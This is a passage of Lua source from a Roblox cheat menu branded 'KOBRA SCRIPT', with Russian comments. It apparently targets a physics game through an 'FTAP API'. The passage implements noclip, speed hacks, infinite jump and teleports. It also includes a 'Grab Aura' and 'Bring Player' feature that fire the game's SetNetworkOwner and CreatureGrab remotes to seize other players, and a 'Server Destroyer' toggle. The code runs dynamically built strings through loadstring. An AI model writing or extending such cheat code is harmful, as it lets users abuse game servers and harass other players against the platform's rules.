    local playerTab = createTab("Player", 4)
    local teleportTab = createTab("Teleport", 5)
    local keybindsTab = createTab("Keybinds", 6)
    local otherTab = createTab("Misc", 7)
    local blobmanTab = createTab("Blobman", 8) -- Новая вкладка для Blobman
    local auraTab = createTab("Auras", 9)

    -- Пример добавления элементов на вкладку Defence
    local defenceTitle = Instance.new("TextLabel")
    defenceTitle.Size = UDim2.new(1, 0, 0, 30)
    defenceTitle.BackgroundTransparency = 1
    defenceTitle.Text = "Defence Options"
    defenceTitle.TextColor3 = Color3.new(1, 1, 1)
    defenceTitle.TextSize = 20
    defenceTitle.Font = Enum.Font.GothamBold
    defenceTitle.LayoutOrder = 1
    defenceTitle.Parent = defenceTab

    -- Добавляем заголовок на вкладку Player
    local playerTitle = Instance.new("TextLabel")
    playerTitle.Size = UDim2.new(1, 0, 0, 30)
    playerTitle.BackgroundTransparency = 1
    playerTitle.Text = "Player Options"
    playerTitle.TextColor3 = Color3.new(1, 1, 1)
    playerTitle.TextSize = 20
    playerTitle.Font = Enum.Font.GothamBold
    playerTitle.LayoutOrder = 1
    playerTitle.Parent = playerTab

    -- Добавляем заголовок на вкладку Player
    local playerTitle = Instance.new("TextLabel")
    playerTitle.Size = UDim2.new(1, 0, 0, 30)
    playerTitle.BackgroundTransparency = 1
    playerTitle.Text = "Welcome to KOBRA!"
    playerTitle.TextColor3 = Color3.new(1, 1, 1)
    playerTitle.TextSize = 20
    playerTitle.Font = Enum.Font.GothamBold
    playerTitle.LayoutOrder = 1
    playerTitle.Parent = mainTab

    -- Добавляем заголовок на вкладку Keybinds
    local keybindsTitle = Instance.new("TextLabel")
    keybindsTitle.Size = UDim2.new(1, 0, 0, 30)
    keybindsTitle.BackgroundTransparency = 1
    keybindsTitle.Text = "Keybind Options"
    keybindsTitle.TextColor3 = Color3.new(1, 1, 1)
    keybindsTitle.TextSize = 20
    keybindsTitle.Font = Enum.Font.GothamBold
    keybindsTitle.LayoutOrder = 1
    keybindsTitle.Parent = keybindsTab

    -- Добавляем элементы на вкладку Blobman
    local blobmanTitle = createLabel(blobmanTab, "Blobman Options", 1)
    blobmanTitle.TextSize = 20
    blobmanTitle.Font = Enum.Font.GothamBold

    local targetPlayerLabel = createLabel(blobmanTab, "Select Target Player:", 2)
    local playerDropdown = createPlayerDropdown(blobmanTab, 3) -- Используем функцию создания выпадающего списка

    local bringBlobmanButton = createButton(blobmanTab, "Bring Blobman", 4, function()
        local spawningPlayerName = game.Players.LocalPlayer.Name
        local targetPlayerName = playerDropdown.getSelectedPlayer() -- Получаем выбранного игрока из выпадающего списка

        if not targetPlayerName then
            print("Please select a target player.")
            return
        end

        -- Динамически создаем и выполняем код
        local codeToExecute = string.format([[
            local spawningPlayerName = "%s"
            local targetPlayerName = "%s"

            local targetPlayer = game:GetService("Players"):FindFirstChild(targetPlayerName)
            if not targetPlayer or not targetPlayer.Character or not targetPlayer.Character:FindFirstChild("HumanoidRootPart") then
                warn("Target player or their character not found.")
                return
            end

            local blobmanCreature = workspace:FindFirstChild(spawningPlayerName .. "SpawnedInToys")
            if not blobmanCreature or not blobmanCreature:FindFirstChild("CreatureBlobman") then
                 warn("Blobman creature not found for local player.")
                 return
            end

            local leftDetector = blobmanCreature.CreatureBlobman:FindFirstChild("LeftDetector")
            local leftWeld = leftDetector and leftDetector:FindFirstChild("LeftWeld")

            if not leftDetector or not leftWeld then
                 warn("Blobman parts (LeftDetector or LeftWeld) not found.")
                 return
            end


            local args = {
                [1] = leftDetector,
                [2] = targetPlayer.Character.HumanoidRootPart,
                [3] = leftWeld
            }

            local remoteFunction = blobmanCreature.CreatureBlobman:FindFirstChild("BlobmanSeatAndOwnerScript")
            if remoteFunction and remoteFunction:FindFirstChild("CreatureGrab") then
                 remoteFunction.CreatureGrab:FireServer(unpack(args))
                 print("Attempted to bring Blobman to " .. targetPlayerName)
            else
                 warn("CreatureGrab RemoteFunction not found.")
            end

        ]], spawningPlayerName, targetPlayerName)

        local success, err = pcall(loadstring(codeToExecute))
        if not success then
            warn("Error executing Blobman bring script: " .. err)
        end
    end)

--[[
  Функция для создания якоря (anchor) на основе GrabParts.
  Она ищет оригинальный объект "GrabParts", определяет, чего он касается,
  клонирует его, очищает от некоторых элементов и позиционирует клон
  на месте первого касания, добавляя визуальный Highlight.
--]]
local function createAnchor()
    -- Проверяем, существует ли уже очищенная модель якоря, и удаляем ее, если да
    local existing = workspace:FindFirstChild("CleanedGrabParts")
    if existing then
        existing:Destroy()
        return nil
    end
    
    -- Ищем оригинальную модель GrabParts в Workspace
    local originalModel = workspace:FindFirstChild("GrabParts")
    
    -- Если оригинальная модель не найдена, выводим сообщение и выходим из функции
    if not originalModel then
        warn("GrabParts model not found in workspace.")
        return nil
    end
    
    -- Включаем коллизию для проверки касаний
    local parts = {}
    for _, part in pairs(originalModel:GetDescendants()) do
        if part:IsA("BasePart") then
            -- Запоминаем исходное состояние CanCollide
            local originalCanCollide = part.CanCollide
            part.CanCollide = true
            table.insert(parts, {part = part, originalCanCollide = originalCanCollide})
        end
    end
    
    -- Ждём кадр, чтобы коллизии обновились
    task.wait(0.1)
    
    -- Проверяем, есть ли касающиеся части
    local hasTouching = false
    for _, partData in pairs(parts) do
        local touching = partData.part:GetTouchingParts()
        for _, hit in pairs(touching) do
            if not hit:IsDescendantOf(originalModel) then
                hasTouching = true
                break
            end
        end
        if hasTouching then
            break
        end
    end
    
    -- Возвращаем оригинальное состояние CanCollide
    for _, partData in pairs(parts) do
        partData.part.CanCollide = partData.originalCanCollide
    end
    
    -- Если нет касающихся частей, выводим сообщение и выходим
    if not hasTouching then
        warn("No touching parts found for GrabParts.")
        return nil
    end
    
    -- Клонируем модель 
    local cleanedModel = originalModel:Clone()
    cleanedModel.Name = "CleanedGrabParts"
    
    -- Очищаем клонированную модель (только удаляем звуки и лучи)
    for _, v in pairs(cleanedModel:GetDescendants()) do
        if v:IsA("BasePart") and (v.Name == "GrabPart" or v.Name == "DragPart") then
            -- Удаляем звуки
            for _, soundName in pairs({"AttachSound1", "AttachSound", "BeamSound", "BeamSound1"}) do
                local sound = v:FindFirstChild(soundName)
                if sound then
                    sound:Destroy()
                end
            end
            -- Делаем часть невидимой
            v.Transparency = 1
        elseif v:IsA("BasePart") and v.Name == "BeamPart" then
            -- Удаляем луч
            local beam = v:FindFirstChild("GrabBeam")
            if beam then
                beam:Destroy()
            end
        end
    end
    
    -- Создаем визуальный индикатор
    local indicator = Instance.new("Part")
    indicator.Name = "AnchorIndicator"
    indicator.Size = Vector3.new(0.5, 0.5, 0.5)
    indicator.Anchored = true
    indicator.CanCollide = false
    indicator.Material = Enum.Material.Neon
    indicator.BrickColor = BrickColor.new("Navy blue")
    indicator.Transparency = 0.3
    indicator.Shape = Enum.PartType.Ball
    indicator.CFrame = originalModel:GetPivot()
    indicator.Parent = cleanedModel
    
    -- Устанавливаем родителя модели на workspace
    cleanedModel.Parent = workspace
    
    print("Anchor created successfully!")
    
    return cleanedModel
end

    -- Функция для создания переключателя коллизии воды
    local function setupWaterCollision()
        -- Создаем переключатель для коллизии воды
        local waterCollisionToggle = createToggle(otherTab, "Water Collision", 2, function(enabled)
            if enabled then
                -- Включение коллизии
                local parentModel = workspace:FindFirstChild("Map")
                    and workspace.Map:FindFirstChild("AlwaysHereTweenedObjects")
                    and workspace.Map.AlwaysHereTweenedObjects:FindFirstChild("Ocean")
                    and workspace.Map.AlwaysHereTweenedObjects.Ocean:FindFirstChild("Object")
                    and workspace.Map.AlwaysHereTweenedObjects.Ocean.Object:FindFirstChild("ObjectModel")
                if parentModel then
                    for _, child in ipairs(parentModel:GetChildren()) do
                        if child.Name == "Ocean" and child:IsA("BasePart") then
                            child.CanCollide = true  -- Включаем коллизию
                        end
                    end
                end
            else
                -- Выключение коллизии
                local parentModel = workspace:FindFirstChild("Map")
                    and workspace.Map:FindFirstChild("AlwaysHereTweenedObjects")
                    and workspace.Map.AlwaysHereTweenedObjects:FindFirstChild("Ocean")
                    and workspace.Map.AlwaysHereTweenedObjects.Ocean:FindFirstChild("Object")
                    and workspace.Map.AlwaysHereTweenedObjects.Ocean.Object:FindFirstChild("ObjectModel")
                if parentModel then
                    for _, child in ipairs(parentModel:GetChildren()) do
                        if child.Name == "Ocean" and child:IsA("BasePart") then
                            child.CanCollide = false  -- Выключаем коллизию
                        end
                    end
                end
            end
        end)
    end

    -- Функция для добавления AntiGrab из FTAP API
    local function setupAntiGrab()
        -- Создаем переключатель для включения AntiGrab
        local antiGrabToggle = createToggle(defenceTab, "Anti Grab", 1, function(enabled)
            if enabled then
                ActiveFunctions.AntiGrab = true
                ApiFTAP.AntiGrab(true)
            else
                ActiveFunctions.AntiGrab = false
                ApiFTAP.AntiGrab(false)
            end
        end)
    end

    local function setupAntiBarrier()
        local toggle = createToggle(otherTab, "Anti Barrier", 3, function(enabled)
            local plots = workspace:FindFirstChild("Plots")
            if not plots then return end
            for _, plot in ipairs(plots:GetChildren()) do
                local barrierModel = plot:FindFirstChild("Barrier")
                if barrierModel then
                    for _, part in ipairs(barrierModel:GetChildren()) do
                        if part:IsA("BasePart") and part.Name == "PlotBarrier" then
                            part.CanCollide = not enabled
                        end
                    end
                end
            end
        end)
    end

    local function setupPlayerSpeed()
        local speedSlider = createSlider(playerTab, "Custom Velocity", 0, 10000, 0, 2, function(value)
            local player = game.Players.LocalPlayer
            local character = player.Character or player.CharacterAdded:Wait()
            local root = character:FindFirstChild("HumanoidRootPart")
            -- Удаляем старый BodyVelocity
            if root then
                local existing = root:FindFirstChild("SpeedVelocity")
                if existing then existing:Destroy() end
                -- Если значение больше 0, создаём новый
                if value > 0 then
                    local bv = Instance.new("BodyVelocity")
                    bv.Name = "SpeedVelocity"
                    bv.Velocity = character.Humanoid.MoveDirection * value
                    bv.MaxForce = Vector3.new(1e5, 0, 1e5)
                    bv.Parent = root
                    -- Обновляем каждый кадр в соответствии с направлением
                    game:GetService("RunService").RenderStepped:Connect(function()
                        if bv and bv.Parent then
                            bv.Velocity = character.Humanoid.MoveDirection * value
                        end
                    end)
                end
            end
        end)
        -- Toggle для постоянной скорости на респавне
        local keepVelocityToggle = createToggle(playerTab, "Keep Velocity On Respawn", 4, function(enabled)
            ActiveFunctions.KeepVelocity = enabled
            if enabled then
                local savedValue = speedSlider.getValue()
                game.Players.LocalPlayer.CharacterAdded:Connect(function(char)
                    local root = char:WaitForChild("HumanoidRootPart")
                    task.wait(0.1)
                    local bv = Instance.new("BodyVelocity")
                    bv.Name = "SpeedVelocity"
                    bv.Velocity = char.Humanoid.MoveDirection * savedValue
                    bv.MaxForce = Vector3.new(1e5, 0, 1e5)
                    bv.Parent = root
                    game:GetService("RunService").RenderStepped:Connect(function()
                        if bv and bv.Parent then
                            bv.Velocity = char.Humanoid.MoveDirection * savedValue
                        end
                    end)
                end)
            end
        end)
    end

local UserInputService = game:GetService("UserInputService")
local TweenService = game:GetService("TweenService")

local isZoomed = false
local defaultFOV = 70
local zoomedFOV = 10

-- Функция переключения зума
local function toggleZoom()
    local camera = workspace.CurrentCamera
    if not camera then return end

    isZoomed = not isZoomed

    local targetFOV = isZoomed and zoomedFOV or defaultFOV

    TweenService:Create(
        camera,
        TweenInfo.new(0.3, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
        {FieldOfView = targetFOV}
    ):Play()

    print("Zoom " .. (isZoomed and "ENABLED" or "DISABLED"))
end

-- Обработка нажатий
UserInputService.InputBegan:Connect(function(input, gameProcessed)
    if gameProcessed then return end
    if input.KeyCode == Enum.KeyCode.Z then
        toggleZoom()
    end
end)


    local function setupInfiniteJump()
        local jumpPower = 50
        local activeBV = nil
        -- Переключатель
        local infiniteJumpToggle = createToggle(playerTab, "Infinite Jump", 5, function(enabled)
            ActiveFunctions.InfiniteJump = enabled
        end)
        -- Слайдер для силы
        local jumpPowerSlider = createSlider(playerTab, "Jump Power", 50, 200, 50, 7, function(value)
            jumpPower = value
        end)
        -- Обработка зажатия/отпускания пробела
        local UIS = game:GetService("UserInputService")
        UIS.InputBegan:Connect(function(input, processed)
            if processed or not ActiveFunctions.InfiniteJump then return end
            if input.KeyCode == Enum.KeyCode.Space then
                local char = game.Players.LocalPlayer.Character
                if not char then return end
                local root = char:FindFirstChild("HumanoidRootPart")
                if not root then return end
                -- Создаем BodyVelocity
                local bv = Instance.new("BodyVelocity")
                bv.Name = "InfiniteJumpVelocity"
                bv.Velocity = Vector3.new(0, jumpPower, 0)
                bv.MaxForce = Vector3.new(0, 1e5, 0)
                bv.Parent = root
                activeBV = bv
            end
        end)
        UIS.InputEnded:Connect(function(input)
            if input.KeyCode == Enum.KeyCode.Space and activeBV then
                activeBV:Destroy()
                activeBV = nil
            end
        end)
    end

    -- Функция спавна паллета перед игроком
    local function spawnPallet()
        local player = game.Players.LocalPlayer
        local character = player.Character or player.CharacterAdded:Wait()
        local humanoidRootPart = character:WaitForChild("HumanoidRootPart")

        -- Получаем текущую позицию и направление персонажа
        local currentPosition = humanoidRootPart.Position
        local lookVector = humanoidRootPart.CFrame.LookVector

        -- Создаем позицию перед игроком (2 единицы вперед вместо 5)
        local targetPosition = currentPosition + (lookVector * 1)

        -- Создаем CFrame смотрящий в ту же сторону, что и игрок
        local targetCFrame = CFrame.new(targetPosition, targetPosition + lookVector)

        -- Добавляем небольшой отступ вверх, чтобы паллет не застрял в земле
        targetCFrame = targetCFrame * CFrame.new(0, 0.5, 0)

        -- Вызываем функцию спавна паллета
        pcall(function()
            local args = {
                [1] = "PalletLightBrown",
                [2] = targetCFrame,
                [3] = Vector3.new(0, 31.239999771118164, 0)
            }
            game:GetService("ReplicatedStorage"):WaitForChild("MenuToys"):WaitForChild("SpawnToyRemoteFunction"):InvokeServer(unpack(args))
        end)
    end

    -- Добавляем функцию спавна паллета на клавишу Tab
    local function setupPalletKeybind()
        -- Создаем информацию о клавише
        local palletKeybindInfo = createKeybindInfo(keybindsTab, "Spawn Pallet", "Tab", 2)

        -- Создаем переключатель для активации/деактивации клавиши
        local palletKeybindToggle = createToggle(keybindsTab, "Enable Pallet Keybind", 4, function(enabled)
            ActiveKeybinds.PalletSpawn = enabled
        end)
    end

    -- Функция телепорта по мышке с ограничением по расстоянию
    local function teleportToMouse()
        local player = game.Players.LocalPlayer
        local mouse = player:GetMouse()
        local character = player.Character
        local humanoid = character and character:FindFirstChild("Humanoid")
        local root = character and character:FindFirstChild("HumanoidRootPart")

        if not (root and humanoid and humanoid.Health > 0) then return end
        local targetPosition = mouse.Hit.Position
        local currentPosition = root.Position
        local maxDistance = 2000
        if mouse.Target and (targetPosition - currentPosition).Magnitude <= maxDistance then
            root.CFrame = CFrame.new(targetPosition + Vector3.new(0, 3, 0))
        end
    end

    -- Установка клавиши T для телепорта и переключателя
    local function setupMouseTeleportKeybind()
        -- Инфо о клавише
        local keybindInfo = createKeybindInfo(teleportTab, "Click Teleport", "T", 2)
        -- Переключатель
        local teleportToggle = createToggle(teleportTab, "Enable Click Teleport", 3, function(enabled)
            ActiveKeybinds.ClickTeleport = enabled
        end)
        -- Обработка клавиши T
        game:GetService("UserInputService").InputBegan:Connect(function(input, gp)
            if gp then return end
            if input.KeyCode == Enum.KeyCode.T and ActiveKeybinds.ClickTeleport then
                teleportToMouse()
            end
        end)
    end

    -- Функция для добавления NoClip (прохождение сквозь стены)
    local function setupNoClip()
        -- Создаем переключатель для включения NoClip
        local noClipToggle = createToggle(playerTab, "No Clip", 9, function(enabled)
            if enabled then
                ActiveFunctions.NoClip = true

                -- Запускаем петлю для NoClip
                spawn(function()
                    while ActiveFunctions.NoClip do
                        local player = game.Players.LocalPlayer
                        local character = player.Character

                        if character then
                            for _, part in pairs(character:GetDescendants()) do
                                if part:IsA("BasePart") then
                                    part.CanCollide = false
                                end
                            end
                        end

                        task.wait(0.1) -- Проверяем каждую 1/10 секунды
                    end
                end)
            else
                ActiveFunctions.NoClip = false

                -- Восстанавливаем обычную коллизию
                local player = game.Players.LocalPlayer
                local character = player.Character

                if character then
                    for _, part in pairs(character:GetDescendants()) do
                        if part:IsA("BasePart") and part.Name ~= "HumanoidRootPart" then
                            part.CanCollide = true
                        end
                    end
                end
            end
        end)
    end

    -- Функция для добавления Anti-Explosion
    local function setupAntiExplosion()
        local lastGoodPosition = nil
        local stateChangedConnection = nil

        local function handleStateChanged(oldState, newState)
            local player = game.Players.LocalPlayer
            local character = player and player.Character
            local root = character and character:FindFirstChild("HumanoidRootPart")

            if not root then return end

            -- Обновляем последнюю "хорошую" позицию, когда игрок не находится в состоянии, вызванном взрывом
            if newState == Enum.HumanoidStateType.Running or
               newState == Enum.HumanoidStateType.Idle or
               newState == Enum.HumanoidStateType.Jumping or
               newState == Enum.HumanoidStateType.Climbing or
               newState == Enum.HumanoidStateType.Swimming or
               newState == Enum.HumanoidStateType.Landed then
                lastGoodPosition = root.Position
            end

            -- Если состояние меняется на Falling или Physics (часто после взрыва)
            if newState == Enum.HumanoidStateType.Falling or
               newState == Enum.HumanoidStateType.Physics then
                if lastGoodPosition then
                    -- Пытаемся вернуть игрока на последнюю хорошую позицию
                    root.CFrame = CFrame.new(lastGoodPosition)
                    -- Можно временно зафиксировать игрока на месте, чтобы предотвратить немедленное отбрасывание
                    -- Это может быть спорно, зависит от игры, но может помочь
                    -- local originalAnchored = root.Anchored
                    -- root.Anchored = true
                    -- task.wait(0.1) -- Короткая фиксация
                    -- root.Anchored = originalAnchored
                end
            end
        end

        -- Создаем переключатель для включения Anti-Explosion
        local antiExplosionToggle = createToggle(defenceTab, "Anti Explosion", 3, function(enabled) -- Порядок layoutOrder может потребоваться настроить
            ActiveFunctions.AntiExplosion = enabled

            local player = game.Players.LocalPlayer
            if not player then return end

            if enabled then
                -- Подключаем обработчик StateChanged при включении
                local humanoid = player.Character and player.Character:FindFirstChild("Humanoid")
                if humanoid then
                    stateChangedConnection = humanoid.StateChanged:Connect(handleStateChanged)
                    print("Anti Explosion Enabled")
                    displayMessage("Anti Explosion Enabled", 2)
                else
                    warn("Humanoid not found for Anti Explosion.")
                    displayMessage("Anti Explosion: Humanoid not found.", 2)
                end
                -- Изначально сохраняем текущую позицию как "хорошую"
                local root = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
                if root then
                    lastGoodPosition = root.Position
                end
            else
                -- Отключаем обработчик StateChanged при выключении
                if stateChangedConnection then
                    stateChangedConnection:Disconnect()
                    stateChangedConnection = nil
                end
                lastGoodPosition = nil -- Сбрасываем последнюю позицию
                print("Anti Explosion Disabled")
                displayMessage("Anti Explosion Disabled", 2)
            end
        end)
    end

    -- Функция обработки нажатия клавиш
    local function setupKeyBindings()
        -- Создаем подключение к событию нажатия клавиш
        game:GetService("UserInputService").InputBegan:Connect(function(input, gameProcessed)
            -- Не обрабатываем, если игра уже обработала ввод (например, в чате)
            if gameProcessed then return end

            -- Обработка клавиши G для закрытия/открытия меню
            if input.KeyCode == Enum.KeyCode.G then
                getgenv().KobraOpen = not getgenv().KobraOpen
                ScreenGui.Enabled = getgenv().KobraOpen
            end

            -- Обработка клавиши Tab для спавна паллета
            if input.KeyCode == Enum.KeyCode.Tab and ActiveKeybinds.PalletSpawn then
                spawnPallet()
            end

            -- Обработка клавиши T для телепортации
            if input.KeyCode == Enum.KeyCode.T and ActiveKeybinds.ClickTeleport then
                teleportToMouse()
            end

            -- Обработка клавиши K для создания якоря
            if input.KeyCode == Enum.KeyCode.K and ActiveKeybinds.AnchorGrabParts then
                createAnchor()
            end

            -- Обработка пробела для бесконечных прыжков
            if input.KeyCode == Enum.KeyCode.Space and ActiveFunctions.InfiniteJump then
                local player = game.Players.LocalPlayer
                local character = player.Character

                if character and character:FindFirstChild("Humanoid") then
                    character.Humanoid:ChangeState(Enum.HumanoidStateType.Jumping)
                end
            end
        end)
    end

    -- Функция для создания и настройки якоря (anchor)
    local function setupAnchorKeybind()
        -- Создаем информацию о клавише
        local anchorKeybindInfo = createKeybindInfo(keybindsTab, "Duplicate GrabParts", "K", 7)

        -- Создаем переключатель для активации/деактивации клавиши
        local anchorKeybindToggle = createToggle(keybindsTab, "Enable Anchor Keybind", 9, function(enabled)
            ActiveKeybinds.AnchorGrabParts = enabled
        end)
    end

    -- Функция для добавления Super Strength из FTAP API
    local function setupSuperStrength()
        -- Создаем переключатель для включения Super Strength
        local superStrengthToggle = createToggle(combatTab, "Super Strength", 2, function(enabled)
            if enabled then
                ActiveFunctions.SuperStrength = true
                -- Включаем SuperStrength из FTAP API
                ApiFTAP.SuperStrength(true)
                print("Super Strength onn")
            else
                ActiveFunctions.SuperStrength = false
                -- Выключаем Super Strength из FTAP API
                ApiFTAP.SuperStrength(false)
                print("Super Strength off")
            end
        end)

        -- Предполагая, что у вас есть функция createSlider для создания слайдеров
        -- Если этой функции нет, вам нужно будет адаптировать этот код к вашей системе
        local strengthSlider = createSlider(combatTab, "Strength", 3, 10000, 500, 150, function(value)
            -- Устанавливаем значение силы через FTAP API
            ApiFTAP.ValueStrength(value)
            print("Значение силы установлено на: ".. value)
        end)
    end

    local function setupAntiBlobman()
        local AntiBlobmanToggle = createToggle(defenceTab, "AntiBlobman", 2, function(enabled)
            if enabled then
                ActiveFunctions.AntiBlobman = true
                ApiFTAP.AntiBlobman(true)
                print("AntiBlobman on")
            else
                ActiveFunctions.AntiBlobman = false
                ApiFTAP.AntiBlobman(false)
                print("AntiBlobman off")
            end
        end)
    end

    -- Добавляем переключатели для Server Destroyer во вкладку Blobman
    local serverDestroyerToggle = createToggle(blobmanTab, "Server Destroyer", 5, function(enabled)
        -- При включении/выключении Server Destroyer, вызываем функцию
        toggleServerDestroyer(enabled, isFriendsWhitelisted) -- Передаем текущее состояние вайтлиста
    end)

    local whitelistFriendsToggle = createToggle(blobmanTab, "Whitelist Friends", 6, function(enabled)
        -- Обновляем состояние вайтлиста
        isFriendsWhitelisted = enabled
        -- Если Server Destroyer уже включен, обновляем его состояние с новым вайтлистом
        if isServerDestroyerEnabled then
             toggleServerDestroyer(true, isFriendsWhitelisted) -- Перезапускаем с новым вайтлистом
        end
    end)

    -- Добавляем элементы на вкладку Teleport
    local teleportTitle = createLabel(teleportTab, "Teleport Options", 1)
    teleportTitle.TextSize = 20
    teleportTitle.Font = Enum.Font.GothamBold

local grabAuraEnabled = false -- Переменная для отслеживания состояния ауры

-- Переменная для отслеживания состояния ауры Grab Aura
local grabAuraEnabled = false
-- Переменная для хранения ссылки на индикатор Grab Aura
local grabAuraIndicator = nil
-- Таблица для отслеживания активных функций (для сохранения/загрузки и отображения)
-- (В вашем полном скрипте эта таблица должна быть глобальной или передаваться)
local ActiveFunctions = ActiveFunctions or {} -- Используем существующую таблицу, если она есть

local function createGrabAura()
    if grabAuraEnabled then
        grabAuraEnabled = false
        ActiveFunctions.GrabAura = false
        print("GrabAura disabled!")
        return
    end

    grabAuraEnabled = true
    ActiveFunctions.GrabAura = true
    print("GrabAura enabled!")

    task.spawn(function()
        while grabAuraEnabled do
            local localPlayer = game:GetService("Players").LocalPlayer
            local character = localPlayer.Character

            if character and character:FindFirstChild("HumanoidRootPart") then
                local closestPlayer = nil
                local closestDistance = 20

                for _, player in pairs(game:GetService("Players"):GetPlayers()) do
                    if player ~= localPlayer and player.Character and player.Character:FindFirstChild("Head") then
                        local distance = (character.HumanoidRootPart.Position - player.Character.Head.Position).Magnitude

                        -- Проверка: не друг, в зоне радиуса
                        if distance <= closestDistance and not localPlayer:IsFriendsWith(player.UserId) then
                            -- Постоянная проверка: есть ли IsHeld и его значение false
                            local isHeld = player.Character:FindFirstChild("IsHeld")
                            if not isHeld or isHeld.Value == false then  -- Если IsHeld отсутствует или его значение false
                                closestPlayer = player
                                closestDistance = distance
                            end
                        end
                    end
                end

                -- Если найден ближайший игрок, выполняем нужную операцию
                if closestPlayer then
                    local args = {
                        [1] = closestPlayer.Character.Head,
                        [2] = closestPlayer.Character.Head.CFrame
                    }

                    local grabEvents = game:GetService("ReplicatedStorage"):WaitForChild("GrabEvents", 10)
                    if grabEvents then
                        local setNetworkOwnerRemote = grabEvents:WaitForChild("SetNetworkOwner", 10)
                        if setNetworkOwnerRemote then
                            pcall(function()
                                setNetworkOwnerRemote:FireServer(unpack(args))
                            end)
                        end
                    end
                end
            end

            task.wait(0.1) -- Небольшая пауза для снижения нагрузки
        end
    end)
end

local function setupGrabAura()
    local grabAuraToggle = createToggle(auraTab, "Grab Aura", 1, function()
        createGrabAura()
    end)
end

local function setupBringTeleport()
    local bringLabel = createLabel(teleportTab, "Bring Player", 3)
    local playerDropdown = createPlayerDropdown(teleportTab, 4)
    local bringButton = createButton(teleportTab, "Bring Selected Player", 5, function()
        local targetName = playerDropdown.getSelectedPlayer()
        if not targetName then
            displayMessage("Select a player first!", 2)
            return
        end

        local Players = game:GetService("Players")
        local ReplicatedStorage = game:GetService("ReplicatedStorage")
        local Lighting = game:GetService("Lighting")
        local TweenService = game:GetService("TweenService")

        local localPlayer = Players.LocalPlayer
        local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
        local root = character:WaitForChild("HumanoidRootPart")
        local oldCFrame = root.CFrame

        local targetPlayer = Players:FindFirstChild(targetName)
        if targetPlayer and targetPlayer.Character and targetPlayer.Character:FindFirstChild("Head") then
            local targetHead = targetPlayer.Character.Head

            -- Постоянный телепорт к цели + FireServer каждый раз
            for i = 1, 2 do -- 50 итераций ≈ 7.5 сек
                if not targetPlayer.Character or not targetPlayer.Character:FindFirstChild("Head") then break end

                -- ТП себя к цели
                root.CFrame = targetHead.CFrame * CFrame.new(2, 0, 0)

                -- FireServer каждый раз
                local args = { [1] = targetHead, [2] = root.CFrame }
                ReplicatedStorage:WaitForChild("GrabEvents"):WaitForChild("SetNetworkOwner"):FireServer(unpack(args))

                task.wait(0.15)
            end

            task.wait(0.1)

            -- В конце перенос
            root.CFrame = oldCFrame
            local front = oldCFrame.LookVector * 5
            targetHead.CFrame = CFrame.new(oldCFrame.Position + front)

            -- DestroyGrabLine
            local destroyArgs = { [1] = targetHead }
            ReplicatedStorage:WaitForChild("GrabEvents"):WaitForChild("DestroyGrabLine"):FireServer(unpack(destroyArgs))
        else
            displayMessage("Player not valid", 2)
        end
    end)
end

local function setupTeleportToPlayer()
    local teleportLabel = createLabel(teleportTab, "Teleport to Player", 6)
    local playerDropdown = createPlayerDropdown(teleportTab, 7)

    local teleportButton = createButton(teleportTab, "Teleport", 8, function()
        local targetName = playerDropdown.getSelectedPlayer()
        if not targetName then
            displayMessage("Select a player first!", 2)
            return
        end

        local Players = game:GetService("Players")
        local localPlayer = Players.LocalPlayer
        local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
        local root = character:FindFirstChild("HumanoidRootPart")

        local targetPlayer = Players:FindFirstChild(targetName)
        if targetPlayer and targetPlayer.Character and targetPlayer.Character:FindFirstChild("HumanoidRootPart") then
            local targetRoot = targetPlayer.Character.HumanoidRootPart
            root.CFrame = targetRoot.CFrame + Vector3.new(2, 0, 0) -- чуть сбоку от игрока
            displayMessage("Teleported to " .. targetName, 2)
        else
            displayMessage("Player not valid", 2)
        end
    end)
end

    -- Вызываем все функции настройки
    setupAntiGrab()
    setupAntiExplosion() -- Добавляем вызов функции настройки Анти-взрывов
    setupPlayerSpeed()
    setupInfiniteJump()
    setupNoClip()
    setupMouseTeleportKeybind()
    setupPalletKeybind()
    setupAnchorKeybind()
    setupWaterCollision()
    setupAntiBarrier()
    setupSuperStrength()
    setupGrabAura()
    setupBringTeleport()
    setupAntiBlobman()
    setupTeleportToPlayer()
    setupKeyBindings()


    -- Устанавливаем первую вкладку как активную по умолчанию
    for _, btn in pairs(Tabs:GetChildren()) do
        if btn:IsA("TextButton") then
            btn.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
            if btn.Text == "Main" then
                btn.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
            end
        end
    end

    for _, v in pairs(Content:GetChildren()) do
        if v:IsA("ScrollingFrame") then
            v.Visible = false
            if v.Name == "MainTab" then
                v.Visible = true
            end
        end
    end

    return ScreenGui
end

-- Создаем UI для анимации загрузки меню
local loadingGui = Instance.new("ScreenGui")
loadingGui.Name = "MenuLoadingGui"
loadingGui.ResetOnSpawn = false
loadingGui.IgnoreGuiInset = true
loadingGui.ZIndexBehavior = Enum.ZIndexBehavior.Global
loadingGui.Parent = game.CoreGui

local loadingFrame = Instance.new("Frame")
loadingFrame.Size = UDim2.new(0, 300, 0, 100)
loadingFrame.Position = UDim2.new(0.5, -150, 0.5, -50)
loadingFrame.BackgroundTransparency = 0.1 -- Менее прозрачный фон
loadingFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
loadingFrame.BorderSizePixel = 1
loadingFrame.BorderColor3 = Color3.fromRGB(50, 50, 50)
loadingFrame.Parent = loadingGui

-- Скругленные углы для рамки загрузки
local LoadingFrameCorner = Instance.new("UICorner")
LoadingFrameCorner.CornerRadius = UDim.new(0, 8)
LoadingFrameCorner.Parent = loadingFrame


local titleLabel = Instance.new("TextLabel")
titleLabel.Size = UDim2.new(1, 0, 0.5, 0)
titleLabel.Position = UDim2.new(0, 0, 0, 0)
titleLabel.BackgroundTransparency = 1
titleLabel.Text = "KOBRA SCRIPT"
titleLabel.TextColor3 = Color3.new(1, 1, 1)
titleLabel.TextSize = 30
titleLabel.Font = Enum.Font.GothamBold
titleLabel.TextXAlignment = Enum.TextXAlignment.Center
titleLabel.TextYAlignment = Enum.TextYAlignment.Center
titleLabel.Parent = loadingFrame

local dotsLabel = Instance.new("TextLabel")
dotsLabel.Size = UDim2.new(1, 0, 0.5, 0)
dotsLabel.Position = UDim2.new(0, 0, 0.5, 0)
dotsLabel.BackgroundTransparency = 1
dotsLabel.Text = ""
dotsLabel.TextColor3 = Color3.new(1, 1, 1)
